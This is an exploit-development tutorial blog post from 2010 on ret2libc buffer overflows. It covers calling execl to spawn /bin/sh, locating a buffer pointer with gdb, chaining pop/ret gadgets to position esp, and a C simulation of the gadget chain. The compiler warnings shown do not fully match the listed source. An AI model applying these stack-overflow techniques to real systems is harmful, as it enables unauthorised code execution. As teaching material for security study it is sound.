Wednesday, 17 March 2010

Ret2libc (continued)

In the previous post we managed to invoke a shell inside GDB by setting values at the points we were able to control. However, that method is unlikely to succeed in practice, because the exact address of /bin/sh is hard to determine and hardcode (it could be brute-forced), so we will switch to a more practical approach.

#include <stdio.h>
#include <unistd.h>
/*
 *
 * This program shows how arguments are passed to execl.
 * Right before the call to execl, the stack holds the address of the string "/bin/sh".
 */
int main(void)
{
    execl("/bin/sh", "aaaaaaa", (char *)NULL);  /* argv[0] is arbitrary; the list must end with a NULL sentinel */
    return 0;
}

suto@home ~/Learning/Expoit Writer/BufferOverFlow/Ret2libc $ gcc CallExecl.c -o CallExecl3
CallExecl.c: In function 'main':
CallExecl.c:10: warning: incompatible implicit declaration of built-in function 'execl'
CallExecl.c:10: warning: missing sentinel in function call
suto@home ~/Learning/Expoit Writer/BufferOverFlow/Ret2libc $ ./CallExecl3
suto@home ~/Learning/Expoit Writer/BufferOverFlow/Ret2libc $ exit
exit
suto@home ~/Learning/Expoit Writer/BufferOverFlow/Ret2libc $ cat|./CallExecl3
id
uid=1000(suto) gid=1004(suto) groups=10(wheel),18(audio),27(video),100(users),1004(suto),1007(vboxusers)
^C



Because finding the exact address of "/bin/sh" is quite hard, we need some way to obtain this address precisely!
Usually there is a pointer to the start of the buffer. In this harder exercise there are two such pointers.

gdb$ x/20x $esp
0xbffff350: 0x0804b000 0x00000128 0x00000000 0x00000000
0xbffff360: 0x00004827 0x00000000 0xb7fcaffc 0xb7fcc840
0xbffff370: 0x0804b008 0xbffff3bc 0xb7f058ba 0xb7fcc840
0xbffff380: 0x0804b008 0x0000011e 0xb7fcf000 0x00000008



And after the overflow:

Breakpoint 2, 0x08048509 in func ()
gdb$ x/20x $ebp

0xbffff488: 0x0000000a 0x0804b008 0x00000000 0xb8000ce0
gdb$ x/s 0x0804b008
0x804b008: "A"*260




So we see that after the overflow there is still one pointer to the start of the buffer. Following the experiment at the beginning, we can therefore perform:
execl("/bin/sh",[something],[something])


The question is how to make esp point exactly at the location holding this pointer, because right after the overflow execution returns to the address we overwrote!
In short, at the moment execl is called we need esp to look like this:

esp : something 0x0804b008 something something

The esp lifting method achieves this.
It relies on two consecutive instructions, pop and ret: pop moves esp one word up the stack, and ret then returns to the value it pops off the stack.

Which means the stack will look like this:

RET RET RET RET2Execl Something PTR

The final RET takes us into execl and at the same time leaves esp pointing at:

ESP Something PTR

which is exactly what we need!

pop ret sequences are very familiar! So we build the exploit string as follows:


[/bin/sh\x00][A*N][RET2popret*n][Execl]
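To check the esp arithmetic behind the picture above, here is an added model that is not part of the original post: a 32-bit stack is an array of words, constructed `G_*` tags stand in for the addresses of a lone `ret`, a `pop; ret` gadget and `execl`, and `lift_esp` walks the chain the way the CPU would. The tags, the `lift_esp`/`execl_arg1` helpers and both stack images are assumptions constructed for this example; only the buffer pointer 0x0804b008 comes from the post.

```c
#include <stdint.h>
#include <stdio.h>
/* Constructed tags standing in for gadget addresses; these are not real addresses. */
#define G_RET    0xf1000000u  /* address of a lone "ret"     : consumes 1 stack word  */
#define G_POPRET 0xf2000000u  /* address of "pop reg; ret"   : consumes 2 stack words */
#define G_EXECL  0xf3000000u  /* stands for the address of execl in libc            */
#define WORD     4

/* Walk a modelled 32-bit stack as the CPU does once the overwritten return
 * address is reached. `esp` is a byte offset into `stack`. Returns esp at the
 * instant execl is entered, or -1 if control flow is lost. */
static int lift_esp(const uint32_t *stack, size_t nwords, int esp)
{
    for (;;) {
        if (esp < 0 || (size_t)(esp / WORD) >= nwords)
            return -1;
        uint32_t target = stack[esp / WORD];
        esp += WORD;                       /* the ret that fetched `target` */
        switch (target) {
        case G_RET:    break;              /* nothing else: the next word is the next target */
        case G_POPRET: esp += WORD; break; /* pop discards one word, then ret */
        case G_EXECL:  return esp;         /* in execl: [esp] = return slot, [esp+4] = arg1 */
        default:       return -1;          /* a non-gadget word was "executed" */
        }
    }
}

/* The first argument execl sees: the word just above its return slot. */
static uint32_t execl_arg1(const uint32_t *stack, size_t nwords, int esp)
{
    if (esp < 0 || (size_t)(esp / WORD) + 1 >= nwords) return 0;
    return stack[esp / WORD + 1];
}

/* Constructed image of the post's picture: RET RET RET RET2Execl Something PTR */
static const uint32_t stack_ret_sled[6] = { G_RET, G_RET, G_RET, G_EXECL, 0x41414141u, 0x0804b008u };
/* Same goal with pop;ret gadgets: each one needs a filler word for its pop. */
static const uint32_t stack_popret[7] = { G_POPRET, 0x41414141u, G_POPRET, 0x41414141u, G_EXECL, 0x41414141u, 0x0804b008u };

int main(void)
{
    int esp = lift_esp(stack_ret_sled, 6, 0);
    printf("ret sled: esp=%d arg1=0x%08x\n", esp, execl_arg1(stack_ret_sled, 6, esp));
    esp = lift_esp(stack_popret, 7, 0);
    printf("pop;ret : esp=%d arg1=0x%08x\n", esp, execl_arg1(stack_popret, 7, esp));
    return 0;
}
```

Both images end with esp one word below the pointer, so execl reads 0x0804b008 as its first argument; a chain whose last word is not a gadget or execl loses control flow and returns -1.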

In the next part we will build the program that exploits the buffer overflow via ret2execl.
